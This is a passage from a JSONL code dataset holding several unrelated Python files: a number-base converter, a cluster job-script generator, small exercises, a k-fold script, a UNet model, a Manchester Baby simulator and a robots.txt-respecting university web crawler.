print(\"Its denary is:\",int(usernum, 8))\n print(\"Its binary is:\",bin(int(usernum, 8))[2:])\n print(\"Its hexadecimal is:\",format(int(int(usernum, 8)), '02x'))\n except:\n print(\"Sorry, that oct is not valid.\")\n runoct()\n\ndef prog():\n typeofchar = input(\"Is your number Denary (d), Binary (b), Hexadecimal (h) or Octal decimal (o)?\\n\")\n typeofchar = typeofchar.lower()\n typeofchar = typeofchar[0]\n if typeofchar == \"d\":\n runden()\n elif typeofchar == \"b\":\n runbin()\n elif typeofchar == \"h\":\n runhex()\n elif typeofchar == \"o\":\n runoct()\n else:\n print(\"Sorry! Your number is not valid.\")\n\nwhile use == True:\n bannerwin()\n prog()\n ask = input(\"Would you like to go again? 
y/n\\n\")\n try:\n ask = ask[0]\n ask = ask.lower()\n except:\n errormessagelater()\n if ask == \"n\":\n use = False\n elif ask == \"y\":\n use = True\n clearcheck()\n else:\n errormessagelater()\n","sub_path":"convint.py","file_name":"convint.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"522284510","text":"import os\nimport subprocess\n\n# kepler_grids\nfrom pyburst.grids import grid_strings\n\n# ========================================================\n# Functions for writing job submission scripts on cluster (e.g. monarch, ICER)\n# ========================================================\nMODELS_PATH = os.environ['KEPLER_MODELS']\n\ndef get_span_string(run0, run1, runs=None):\n \"\"\"Returns string of run0-run1, (or run0 if run0 == run1)\n \"\"\"\n if runs is not None:\n string = ''\n for run in runs:\n string += f'{run},'\n return string\n\n elif run0 == run1:\n return f'{run0}'\n else:\n return f'{run0}-{run1}'\n\n\ndef get_jobstring(batch, run0, run1, source, include_source=True):\n source = grid_strings.source_shorthand(source=source)\n span = get_span_string(run0, run1)\n source_str = ''\n\n if include_source:\n source_str = f'{source[:2]}_'\n\n return f'{source_str}{batch}_{span}'\n\n\ndef write_individual_scripts(batches, runs, source, walltime, **kwargs):\n \"\"\"Writes multiple jobscripts for individual models\n\n Created for the purpose of resubmitting particular jobs that\n failed to start.\n\n e.g. batches=[1,2,2,3], runs=[3,4,5,3] will write scripts for the models:\n batch_1_3, batch_2_4, batch_2_5, batch_3_3\n\n Parameters\n ----------\n batches : 1darray\n array of batches to write scripts for\n runs : 1darray\n array of runs corresponding to each batch in 'batches'\n \"\"\"\n for i, batch in enumerate(batches):\n run = runs[i]\n batch_str = grid_strings.get_batch_string(batch, source)\n path = os.path.join(MODELS_PATH, batch_str, 'logs')\n\n write_submission_script(batch, run0=run, run1=run, source=source,\n walltime=walltime, path=path, **kwargs)\n\n\ndef write_submission_script(batch, source, walltime, path=None,\n run0=None, run1=None, runs=None,\n parallel=False, qos='normal', basename='xrb',\n restart=False, max_tasks=16, debug=False,\n adapnet_filename=None, bdat_filename=None,\n dependency=False):\n \"\"\"Writes jobscripts to execute on MONARCH/ICER cluster\n\n Parameter:\n ----------\n runs : list (optional)\n specify an arbitrary list of runs, instead of a span from run0-run1\n parallel : bool\n launch parallel independent kepler tasks\n path : str\n target path for slurm script\n max_tasks : int\n max number of tasks allowed on one node\n \"\"\"\n source = grid_strings.source_shorthand(source=source)\n run0, run1, runs, n_runs = check_runs(run0, run1, runs)\n\n batch_str = grid_strings.get_batch_string(batch, source)\n if path is None:\n path = os.path.join(MODELS_PATH, batch_str, 'logs')\n\n if parallel:\n if n_runs > max_tasks:\n raise ValueError(f'ntasks ({n_runs}) larger than max_tasks ({max_tasks})')\n\n extensions = {'monarch': '.sh', 'icer': '.qsub'}\n\n job_str = get_jobstring(batch=batch, run0=run0, run1=run1, source=source)\n time_str = f'{walltime:02}:00:00'\n\n for cluster in ['monarch', 'icer']:\n print('Writing submission script for cluster:', cluster)\n ext = extensions[cluster]\n\n script_str = get_submission_str(run0=run0, run1=run1, runs=runs, source=source,\n batch=batch, basename=basename, qos=qos,\n time_str=time_str, job_str=job_str,\n 
cluster=cluster, parallel=parallel,\n debug=debug, restart=restart,\n adapnet_filename=adapnet_filename,\n bdat_filename=bdat_filename,\n dependency=dependency)\n\n span = get_span_string(run0, run1)\n prepend_str = {True: 'restart_'}.get(restart, '')\n\n filename = f'{cluster}_{prepend_str}{source}_{batch}_{span}{ext}'\n filepath = os.path.join(path, filename)\n\n with open(filepath, 'w') as f:\n f.write(script_str)\n\n if parallel:\n write_parallel_script(run0=run0, run1=run1, batch=batch, path=path,\n restart=restart, basename=basename, source=source,\n debug=debug, adapnet_filename=adapnet_filename,\n bdat_filename=bdat_filename)\n\n\ndef get_submission_str(run0, run1, source, runs, batch, basename, cluster,\n qos, time_str, parallel, job_str, debug, restart,\n adapnet_filename=None, bdat_filename=None, dependency=False):\n source = grid_strings.source_shorthand(source=source)\n span_str = get_span_string(run0, run1, runs=runs)\n batch_str = get_jobstring(batch=batch, run0=run0, run1=run1, source=source,\n include_source=False)\n # TODO: check if adapnet/bdat exists\n if adapnet_filename is None:\n adapnet_filename = 'adapnet_alex_email_dec.5.2016.cfg'\n if bdat_filename is None:\n bdat_filename = '20161114Reaclib.bdat5.fixed'\n\n # ===== restart parameters =====\n cmd_str = {True: 'z1', False: 'xrb_g'}[restart]\n restart_str = {True: 'restart_', False: ''}[restart]\n debug_str = {True: 'x', False: ''}[debug]\n\n dependency_str = ''\n dependency_bash = ''\n if dependency:\n dependency_str = '#SBATCH --dependency=singleton'\n dependency_bash = \"\"\"if (( $N == 1 ))\nthen\n sleep 60\n cd $KEPLER_MODELS/{source}_{batch}/logs\n sbatch icer_restart_{source}_{batch}_{span_str}.qsub\nfi\"\"\"\n\n if cluster == 'monarch':\n return f\"\"\"#!/bin/bash\n###################################\n#SBATCH --job-name={job_str}\n#SBATCH --output=arrayJob_%A_%a.out\n#SBATCH --error=arrayJob_%A_%a.err\n#SBATCH --array={span_str}\n#SBATCH --time={time_str}\n#SBATCH --ntasks=1\n#SBATCH --cpus-per-task=1\n#SBATCH --qos={qos}\n#SBATCH --mem-per-cpu=1024\n#SBATCH --mail-type=BEGIN,END,FAIL\n#SBATCH --mail-user=zac.johnston@monash.edu\n###################################\n\nN=$SLURM_ARRAY_TASK_ID\nEXE_PATH=$KEPLER_PATH/gfortran/keplery\nADAPNET_PATH=$PYBURST/files/{adapnet_filename}\nBDAT_PATH=$PYBURST/files/{bdat_filename}\n\ncd $KEPLER_MODELS/{source}_{batch}/{basename}$N/\nln -sf $ADAPNET_PATH ./adapnet.cfg\nln -sf $BDAT_PATH ./bdat\n$EXE_PATH {basename}$N {cmd_str} {debug_str}\"\"\"\n\n elif cluster == 'icer':\n return f\"\"\"#!/bin/bash --login\n###################################\n#SBATCH --job-name {job_str}\n#SBATCH --array={span_str}\n#SBATCH --time={time_str}\n#SBATCH --ntasks=1\n#SBATCH --cpus-per-task=1\n#SBATCH --constraint=intel16\n{dependency_str}\n#SBATCH --exclude=lac-217,lac-356,lac-357,lac-358\n#SBATCH --mem-per-cpu=1024\n#SBATCH --mail-type=BEGIN,END,FAIL\n#SBATCH --mail-user=zac.johnston@monash.edu\n###################################\nN=$SLURM_ARRAY_TASK_ID\nEXE_PATH=$KEPLER_PATH/gfortran/keplery\nADAPNET_PATH=$PYBURST/files/{adapnet_filename}\nBDAT_PATH=$PYBURST/files/{bdat_filename}\n\n{dependency_bash}\ncd $KEPLER_MODELS/{source}_{batch}/xrb$N/\nln -sf $ADAPNET_PATH ./adapnet.cfg\nln -sf $BDAT_PATH ./bdat\n$EXE_PATH {basename}$N {cmd_str}\"\"\"\n else:\n raise ValueError('invalid cluster. 
Must be one of [monarch, icer]')\n\n\ndef write_parallel_script(run0, run1, batch, path, source, restart, debug=False,\n basename='xrb', gen_file='xrb_g', adapnet_filename=None,\n bdat_filename=None):\n \"\"\"========================================================\n Writes a bash script to launch parallel kepler tasks\n ========================================================\"\"\"\n source = grid_strings.source_shorthand(source=source)\n print('Writing MPI script')\n if adapnet_filename is None:\n adapnet_filename = 'adapnet_alex_email_dec.5.2016.cfg'\n if bdat_filename is None:\n bdat_filename = '20161114Reaclib.bdat5.fixed'\n\n # ===== restart things =====\n debug_str = {True: 'x', False: ''}[debug]\n restart_str = {True: 'restart_', False: ''}[restart]\n start_str = {True: 'Restarting', False: 'Starting'}[restart]\n execute_str = {True: f'./k $run_str z1 {debug_str}',\n False: f'./k $run_str {gen_file}'}[restart]\n\n filename = f'parallel_{restart_str}{source}_{batch}_{run0}-{run1}.sh'\n filepath = os.path.join(path, filename)\n\n with open(filepath, 'w') as f:\n f.write(f\"\"\"#!/bin/bash\n\nexe_path=$KEPLER_PATH/gfortran/keplery\nbatch_dir=$KEPLER_MODELS/{source}_{batch}\nADAPNET_PATH=$PYBURST/files/{adapnet_filename}\nBDAT_PATH=$PYBURST/files/{bdat_filename}\n\nfor run in $(seq {run0} {run1}); do\n run_str=\"{basename}${{run}}\"\n echo \"{start_str}\"\n cd $batch_dir/$run_str\n ln -sf $exe_path ./k\n ln -sf $ADAPNET_PATH ./adapnet.cfg\n ln -sf $BDAT_PATH ./bdat\n {execute_str} > ${{run_str}}_std.out &\ndone\n\necho 'Waiting for jobs to finish'\nwait\necho 'All jobs finished'\"\"\")\n\n # ===== make executable =====\n subprocess.run(['chmod', '+x', filepath])\n\n\ndef check_runs(run0, run1, runs):\n \"\"\"Checks run parameters, and returns necessary values\n\n Behaviour:\n if runs is None: assume full span from run0-run1\n if runs is not None: use runs specified\n\n Returns:\n run0, run1, runs, n_runs\n \"\"\"\n if (run0 is None\n and run1 is None\n and runs is None):\n raise ValueError('Must provide both run0 and run1, or runs')\n\n if runs is None:\n return run0, run1, runs, (run1 - run0 + 1)\n else:\n return runs[0], runs[-1], runs, len(runs)\n","sub_path":"pyburst/kepler/kepler_jobscripts.py","file_name":"kepler_jobscripts.py","file_ext":"py","file_size_in_byte":9638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"521486253","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nt = int(input())\nfor i in range(0, t):\n len =int(input()) \n l = [int(x) for x in input().split(\" \")]\n for j in range (0,len):\n if(l.count(l[j])%2!=0):\n print(l[j])\n break\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Code/CodeRecords/2424/60762/259658.py","file_name":"259658.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"129853134","text":"def matrix_element_sum(matrix):\n column_map = {}\n price = 0\n\n for row in matrix:\n for index, item in enumerate(row):\n if item == 0:\n column_map[str(index)] = False\n else:\n check_price = column_map.get(str(index), True)\n if check_price:\n price += item\n\n return price\n\n\nprint(matrix_element_sum([[0, 1, 1, 2],\n [0, 5, 0, 0],\n [2, 0, 3, 3]]))\n","sub_path":"codefight/arrays/matrix_element_sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"35520524","text":"def 
extract_even(string):\n dic=[]\n for i in string:\n if i %2 ==0:\n dic.append(i)\n dic= sorted(dic)\n print(dic)\n return dic\nstring= [1, 4, 2, 8, 5, -1, 10]\nextract_even(string)\n\neven_list = extract_even([1, 2, 5, -10, 9, 6])\n\nif set(even_list) == set([2, -10, 6]):\n print(\"Your function is correct\")\nelse:\n print(\"Ooops, bugs detected\")\n","sub_path":"Buoi 5/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"193461914","text":"import os\n\nfrom lib.deck import Deck\nGIT_PATH = os.environ['GIT_PATH']\n\ndef info(workdir):\n deck = Deck('0000000')\n path = os.path.join(GIT_PATH,workdir,'.git/refs')\n git_tree = []\n\n branch = tree_grouth(path, '/')\n\n return deck.response(\"PEDDING\",branch)\n\n\ndef tree_grouth(path, node):\n branch = [node]\n for elf in os.listdir(path):\n elf_path = os.path.join(path, elf)\n if os.path.isdir(elf_path):\n branch.append(tree_grouth(elf_path, elf))\n else:\n branch.append(elf)\n\n return branch\n\n\n","sub_path":"flask/git_docker/git/items/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"414227011","text":"class Solution: \n #2014-10-15\n #Two Sum \n # @return a tuple, (index1, index2)\n def twoSum(self, num, target):\n x = [t for t in num]\n x.sort()\n x1 = [t for t in x if t <= target/2]\n x2 = [t for t in x if t >= target/2] \n \n for i in range(len(x1)):\n try:\n j = x2.index(target - x1[i]) \n index1 = num.index(x1[i])\n index2 = num.index(x2[j])\n if index1 == index2:\n for z in range(index1 + 1, len(num)):\n if num[z] == x2[j]:\n index2 = z\n if index1 > index2:\n return (index2+1, index1+1)\n return (index1 + 1, index2 + 1)\n except:\n continue","sub_path":"LeetCode/Solved/oj001.py","file_name":"oj001.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"69409703","text":"# Copyright (c) 2019 UFCG-LSD.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nfrom broker.utils.linkedlist import LinkedList\nfrom broker.utils.accumulated_sum_linked_list import AccumulatedSumLinkedList\nfrom broker.service.job_cleaner_daemon import JobRepr\n\n\nclass TestLinkedList(unittest.TestCase):\n\n \"\"\"\n Set up linkedlist object\n \"\"\"\n\n def setUp(self):\n self.linkedlist = LinkedList()\n self.accumulated_sum_linked_list = AccumulatedSumLinkedList()\n\n def tearDown(self):\n pass\n\n \"\"\"\n Test element insertion in linkedlist\n \"\"\"\n\n def test_insert_element(self):\n\n element1 = JobRepr('kj-123123', 10)\n element2 = JobRepr('kj-321321', 10)\n element3 = JobRepr('kj-321111', 15)\n element4 = JobRepr('kj-321222', 5)\n element5 = JobRepr('kj-321222', 100)\n\n self.accumulated_sum_linked_list.insert(element1)\n self.accumulated_sum_linked_list.insert(element2)\n 
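        # (added note, inferred from the expected values below: the accumulated-
        # sum list stores deltas, so each node keeps only the time remaining
        # after all earlier nodes expire, and duplicate expiry times merge into
        # one node -- durations 5, 10, 15, 100 become remaining times [5, 5, 5, 85])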
self.accumulated_sum_linked_list.insert(element3)\n self.accumulated_sum_linked_list.insert(element4)\n self.accumulated_sum_linked_list.insert(element5)\n\n remaining_time_list = [5, 5, 5, 85]\n app_ids_list = [['kj-321222'],\n ['kj-123123', 'kj-321321'],\n ['kj-321111'],\n ['kj-321222']]\n\n obj_to_list = self.accumulated_sum_linked_list.to_list()\n\n for i in range(len(obj_to_list)):\n self.assertEqual(remaining_time_list[i],\n obj_to_list[i].get_remaining_time())\n\n for j in range(len(app_ids_list[i])):\n self.assertTrue(app_ids_list[i][j] in\n obj_to_list[i].get_app_ids())\n\n def test_push_element(self):\n\n element1 = JobRepr('kj-123123', 10)\n element2 = JobRepr('kj-321321', 10)\n element3 = JobRepr('kj-321111', 15)\n element4 = JobRepr('kj-321222', 5)\n element5 = JobRepr('kj-321222', 100)\n\n self.linkedlist.push(element1)\n self.linkedlist.push(element2)\n self.linkedlist.push(element3)\n self.linkedlist.push(element4)\n self.linkedlist.push(element5)\n\n remaining_time_list = [10, 10, 15, 5, 100]\n obj_to_list = self.linkedlist.to_list()\n\n app_ids_list = [['kj-123123'],\n ['kj-321321'],\n ['kj-321111'],\n ['kj-321222'],\n ['kj-321222']]\n\n for i in range(len(obj_to_list)):\n self.assertEqual(remaining_time_list[i],\n obj_to_list[i].get_remaining_time())\n\n for j in range(len(app_ids_list[i])):\n self.assertTrue(app_ids_list[i][j] in\n obj_to_list[i].get_app_ids())\n\n def test_pop_element(self):\n\n objs = [JobRepr('kj-123123', 10),\n JobRepr('kj-321321', 10),\n JobRepr('kj-321111', 15),\n JobRepr('kj-321222', 5),\n JobRepr('kj-321222', 100)]\n\n for obj in objs:\n self.linkedlist.push(obj)\n\n size = 5\n\n for i in range(size):\n self.assertEqual(self.linkedlist.pop().value, objs[i])\n size -= 1\n self.assertEqual(self.linkedlist.size(), size)\n\n def test_size(self):\n\n self.assertTrue(self.linkedlist.is_empty())\n self.assertEqual(self.linkedlist.size(), 0)\n\n self.linkedlist.push(0)\n self.linkedlist.push(50)\n\n self.assertFalse(self.linkedlist.is_empty())\n self.assertEqual(self.linkedlist.size(), 2)\n\n self.linkedlist.pop()\n self.assertFalse(self.linkedlist.is_empty())\n self.assertEqual(self.linkedlist.size(), 1)\n\n self.linkedlist.pop()\n self.assertTrue(self.linkedlist.is_empty())\n self.assertEqual(self.linkedlist.size(), 0)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"broker/tests/unit/utils/test_linkedlist.py","file_name":"test_linkedlist.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"33555401","text":"import pandas as pd\r\nfrom sklearn import model_selection\r\n\r\ndf_train = pd.read_csv(\"../input/adult.csv\")\r\ntarget = \"income\"\r\ndf_train[\"kfold\"] = -1\r\n\r\n# Shuffling data\r\ndf_train = df_train.sample(frac=1).reset_index(drop=True)\r\n\r\ny = df_train[target].values\r\n\r\nkf = model_selection.StratifiedKFold(n_splits=5)\r\nfor f, (t_, v_) in enumerate(kf.split(X=df_train,y=y)):\r\n df_train.loc[v_, 'kfold'] = f\r\n\r\ndf_train.to_csv(\"../input/adult_folds.csv\", index=False)","sub_path":"ml_06_us_adult_imcome/src/create_folds.py","file_name":"create_folds.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"483064343","text":"# full assembly of the sub-parts to form the complete net\n\nimport torch.nn.functional as F\n\nimport torch.nn as nn\n\nimport os\n\n\n\nfrom libs.unet_parts import inconv,down,up,outconv\n\n\nclass 
UNet(nn.Module):\n def __init__(self, n_classes,n_channels=3):\n super(UNet, self).__init__()\n filters = [32,64,96,128,256] #[64,128,256,512,1024]\n self.n_classes = n_classes\n self.inc = inconv(n_channels, filters[0]) \n self.down1 = down(filters[0], filters[1])\n self.down2 = down(filters[1], filters[2])\n self.down3 = down(filters[2], filters[3])\n self.down4 = down(filters[3], filters[3])\n self.up1 = up(filters[3]+filters[3], filters[2])\n self.up2 = up(filters[2]+filters[2], filters[1])\n self.up3 = up(filters[1]+filters[1], filters[0])\n self.up4 = up(filters[0]+filters[0], 16)\n self.outc = outconv(16, n_classes)\n \n \n\n def forward(self, x):\n x_size = x.size()\n x1 = self.inc(x)\n \n x2 = self.down1(x1)\n \n x3 = self.down2(x2)\n \n x4 = self.down3(x3)\n \n x5 = self.down4(x4)\n \n x = self.up1(x5, x4)\n \n x = self.up2(x, x3)\n \n x = self.up3(x, x2)\n \n \n x = self.up4(x, x1)\n \n x = self.outc(x)\n \n x = F.interpolate(x, x_size[2:], mode='bilinear', align_corners=False)\n return x\n '''\n if labels is not None:\n\n classwise_pixel_acc, classwise_gtpixels, classwise_predpixels = prediction_stat([x], labels, self.n_classes)\n\n # Need to perform this operation for MultiGPU\n classwise_pixel_acc = Variable(torch.FloatTensor([classwise_pixel_acc]).cuda())\n classwise_gtpixels = Variable(torch.FloatTensor([classwise_gtpixels]).cuda())\n classwise_predpixels = Variable(torch.FloatTensor([classwise_predpixels]).cuda())\n\n return x, classwise_pixel_acc, classwise_gtpixels, classwise_predpixels\n else:\n return x\n '''\n","sub_path":"00_代码/02_噪声标签实验代码/毕业论文代码/02_Weight_Loss_UNet/libs/unet_model.py","file_name":"unet_model.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82199470","text":"#!/usr/bin/env python\n#\n# Manchester Baby simulator\n#\nimport Register\nimport StoreLines\nimport CPU\n\n# Dictionary containing the instruction set, the associted 'mnemonic' and the 'description' of the instruction.\n#\n# Instructions are stored in a list with each entry being a dictionary item. 
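# (Added aside -- a sketch, not in the original: because several mnemonics
# share one opcode, a dict gives O(1) lookup in place of the linear scan used
# in Assembler below; 'opcode_by_mnemonic' is a hypothetical name:
# opcode_by_mnemonic = {i['mnemonic']: i['opcode'] for i in instructions})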
The dictionary item contains the\n# SSEM opcode for instruction along with information about the instruction:\n#\n# { mnemonic: code, instruction: details }\n#\n# The instruction detail is a dictionary item containing the following items:\n# Opcode\n# English description of the purpose of the instruction.\n#\ninstructions = [\n { 'mnemonic': 'JMP', 'opcode': 0, 'description': 'Copy the contents of store line to CI' },\n { 'mnemonic': 'JRP', 'opcode': 1, 'description': 'Add the content of the store line to CI' },\n { 'mnemonic': 'JPR', 'opcode': 1, 'description': 'Add the content of the store line to CI' },\n { 'mnemonic': 'JMR', 'opcode': 1, 'description': 'Add the content of the store line to CI' },\n { 'mnemonic': 'LDN', 'opcode': 2, 'description': 'Copy the content of the store line, negated, into the Accumulator' },\n { 'mnemonic': 'STO', 'opcode': 3, 'description': 'Copy the contents of the Accumulator to the store line' },\n { 'mnemonic': 'SUB', 'opcode': 4, 'description': 'Subtract the contents of the store line from the Accumulator' },\n { 'mnemonic': 'CMP', 'opcode': 6, 'description': 'Skip the next instruction if the content of the Accumulator is negative' },\n { 'mnemonic': 'SKN', 'opcode': 6, 'description': 'Skip the next instruction if the content of the Accumulator is negative' },\n { 'mnemonic': 'STOP', 'opcode': 7, 'description': 'Light the stop light and halt the machine' },\n { 'mnemonic': 'HLT', 'opcode': 7, 'description': 'Light the stop light and halt the machine' },\n { 'mnemonic': 'STP', 'opcode': 7, 'description': 'Light the stop light and halt the machine' }\n ]\n\ndef ReverseBits(value, bitCount = 32):\n '''Reverse the bits in the specified value. This method provides the CPU\n with the ability to translate SSEM numbers into conventional twos complement\n numbers used in modern computers.\n\n SSEM numbers are twos complement numbers with the LSB and MSB reversed\n compared to conventional twos complement form.'''\n result = 0\n while (bitCount > 0):\n result <<= 1\n if (value & 1):\n result |= 1\n value >>= 1\n bitCount -= 1\n return(result)\n\ndef Assembler(fileName, storeLines):\n '''Open the specified file and convert the assembler instructions into\n binary and save into the storeLines.'''\n with open(fileName, \"r\") as source:\n lineNumber = 0\n for line in source:\n lineNumber += 1\n words = line.rstrip('\\n').split()\n if (words[0] != '--'):\n sl = int(words[0].strip(':'))\n m = words[1].upper()\n if (m == 'NUM'):\n store = ReverseBits(int(words[2]))\n else:\n i = next((i for i, x in enumerate(instructions) if (x['mnemonic'] == m)), None)\n if (i == None):\n print('Cannot process line {}: {}'.format(lineNumber, line))\n exit()\n else:\n opcode = instructions[i]['opcode']\n if (m in ['STOP', 'HLT', 'CMP', 'SKN']):\n ln = 0\n else:\n ln = int(words[2])\n store = ReverseBits(ln | (opcode << 13))\n storeLines.SetLine(sl, Register.Register(store))\n#\n# The Manchester Baby\n#\nstoreLines = StoreLines.StoreLines(32)\nAssembler('Samples/hfr989.asm', storeLines)\ncpu = CPU.CPU(storeLines)\ncpu.RunProgram(debugging = False)\n","sub_path":"ManchesterBaby.py","file_name":"ManchesterBaby.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"152284420","text":"import requests, os\nfrom urllib.parse import urljoin, urlparse\nfrom bs4 import BeautifulSoup\nfrom reppy.robots import Robots\nimport json\n\nheaders = {\n\t'User-Agent': 'mind32544',\n\t'From': 
'jirateep.t@ku.th'\n}\n\nlongest_url_path = 10\nspecific_domains = ['ku.ac.th']\nmax_nb_of_web_page = 20000\n# nb_of_collected = 0\n\ndef is_in_specific_domain(url) :\n\tfor domain in specific_domains :\n\t\tif domain in url :\n\t\t\treturn True\n\treturn False\n\ndef get_page(url) :\n\tglobal headers\n\ttext = ''\n\ttry :\n\t\tr = requests.get(url,headers=headers,timeout=2)\n\t\ttext = r.text\n\t\tif r.status_code != 200 :\n\t\t\ttext = ''\n\texcept(KeyboardInterrupt, SystemExit) :\n\t\traise\n\texcept :\n\t\tprint('GET PAGE ERROR!')\n\treturn text.lower()\n\ndef find_collect_file(url, raw_html) :\n\tpath = urlparse(url).path\n\tfilename = path.split('/')[-1]\n\tbase_url = urljoin(url, '/')\n\tremoving_words = ['http://', 'https://', ':80', ':8000', ':212']\n\tfor word in removing_words :\n\t\tbase_url = base_url.replace(word, '')\n\tpath = base_url.replace('/', '') + path\n\tif filename == '' :\n\t\tif path[-1] != '/' :\n\t\t\tpath += '/'\n\t\tfilename = 'index.html'\n\t\tpath += filename\n\treturn path, (filename.split('.')[-1] in ['html', 'htm'] or filename == 'robots.txt') and 'ku.ac.th' in path\n\ndef collect_file(url, raw_html, head_dir, is_count) :\n\tpath, is_collect = find_collect_file(url, raw_html)\n\tif is_collect :\n\t\tif is_count :\n\t\t\tglobal nb_of_collected, max_nb_of_web_page\n\t\t\tnb_of_collected += 1\n\t\t\tprint(f'[{nb_of_collected}/{max_nb_of_web_page}] collecting: {url}')\n\t\tdirectory_list = path.split('/')\n\t\tfor i in range(len(directory_list)) :\n\t\t\tdir_path = head_dir + '/'.join(directory_list[:i])\n\t\t\tif not os.path.isdir(dir_path) :\n\t\t\t\tos.makedirs(dir_path)\n\t\twith open(head_dir + '/'.join(directory_list), 'w', encoding='utf-8') as fw :\n\t\t\tfw.write(raw_html)\n\ndef is_do_not_want_this_file_type(url) :\n\tdo_not_want_list = ['.pdf', '.doc', '.xls', '.png', '.jpg', '.wmv', '.avi', '.mov', '.mp', '.zip', '.rar', ' ']\n\tfor i in do_not_want_list :\n\t\tif i in url :\n\t\t\treturn True\n\treturn False\n\ndef link_parser(raw_html, url) :\n\tglobal longest_url_path\n\turls = []\n\tsoup = BeautifulSoup(raw_html, 'html.parser')\n\tfor a_tag in soup.find_all('a') :\n\t\tlink = a_tag.get('href')\n\t\tfull_link = urljoin(url,link)\n\t\tis_path_long = len((urlparse(full_link).path).split('/')) > longest_url_path\n\t\tis_name_long = False\n\t\tfor i in (urlparse(full_link).path).split('/') :\n\t\t\tif len(i) > 100 :\n\t\t\t\tis_name_long = True\n\t\tif len(full_link) > 0 and full_link not in urls and not is_path_long and is_in_specific_domain(full_link) and not is_do_not_want_this_file_type(full_link) and not is_name_long and '*' not in full_link:\n\t\t\turls.append(full_link)\n\treturn urls\n\ndef is_robot_correct_syntax(robot_text) :\n\tkeywords = ['user-agent:', 'allow:']\n\tfor key in keywords :\n\t\tif key not in robot_text :\n\t\t\treturn False\n\treturn True\n\ndef allow(robot_url, url, text) :\n\tglobal headers\n\trobots = Robots.fetch(robot_url)\n\treturn robots.allowed(url, headers['User-Agent'])\n\n\ndef is_robot_allow(url) :\n\trobot_url = Robots.robots_url(url)\n\trobot_text = get_page(robot_url)\n\tif len(robot_text) > 0 and is_robot_correct_syntax(robot_text) :\n\t\tcollect_file(robot_url, robot_text, 'robot/', False)\n\t\tif 'sitemap:' in robot_text :\n\t\t\tcollect_file(robot_url, robot_text, 'sitemap/', False)\n\t\treturn allow(robot_url, url, robot_text)\n\treturn True\n\ndef write_queue(queue, filename) :\n\twith open(filename, 'w', encoding='utf-8') as fw :\n\t\tjson.dump(queue, fw)\n\t\t# fw.write('\\n'.join(queue))\n\t\n\ndef 
load_queue(filename) :\n\twith open(filename, 'r', encoding='utf-8') as fr :\n\t\treturn json.load(fr)\n\t\t# queue = fr.readlines()\n\t\t# return [url.replace('\\n', '') for url in queue]\n\ndef write_nb(nb, filename) :\n\twith open(filename, 'w', encoding='utf-8') as fw :\n\t\tfw.write(str(nb))\n\ndef load_nb(filename) :\n\twith open(filename, 'r', encoding='utf-8') as fr :\n\t\tlines = fr.readlines()\n\t\treturn int(lines[0])\n\nif not os.path.isfile('nb_of_collected.txt') :\n\twrite_nb(0, 'nb_of_collected.txt')\nif not os.path.isfile('frontier_q.txt') :\n\twrite_queue(['http://www.ku.ac.th/web2012/'], 'frontier_q.txt')\nif not os.path.isfile('visited.txt') :\n\twrite_queue([], 'visited.txt')\n\nnb_of_collected = load_nb('nb_of_collected.txt')\nfrontier_q = load_queue('frontier_q.txt')\nvisited = load_queue('visited.txt')\n# frontier_q = ['http://www.ku.ac.th/web2012/']\n# visited = []\n\nwhile len(frontier_q) > 0 and nb_of_collected < max_nb_of_web_page:\n\tnow_url = frontier_q[0]\n\tprint('.', end='', flush=True)\n\tfrontier_q = frontier_q[1:]\n\tvisited.append(now_url)\n\ttext = ''\n\tif is_robot_allow(now_url) :\n\t\ttext = get_page(now_url)\n\tif len(text) > 0 :\n\t\tcollect_file(now_url, text, 'html/', True)\n\t\tlinks = link_parser(text, now_url)\n\t\tfor link in links :\n\t\t\tif link not in frontier_q and link not in visited :\n\t\t\t\tfrontier_q.append(link)\n\twrite_queue(frontier_q, 'frontier_q.txt')\n\twrite_queue(visited, 'visited.txt')\n\twrite_nb(nb_of_collected, 'nb_of_collected.txt')","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"409968409","text":"import nltk.data\nfrom nltk import sent_tokenize, word_tokenize, pos_tag, ne_chunk\nfrom nameparser.parser import HumanName\nimport csv\n\n#http://stackoverflow.com/questions/20290870/improving-the-extraction-of-human-names-with-nltk\n\nwith 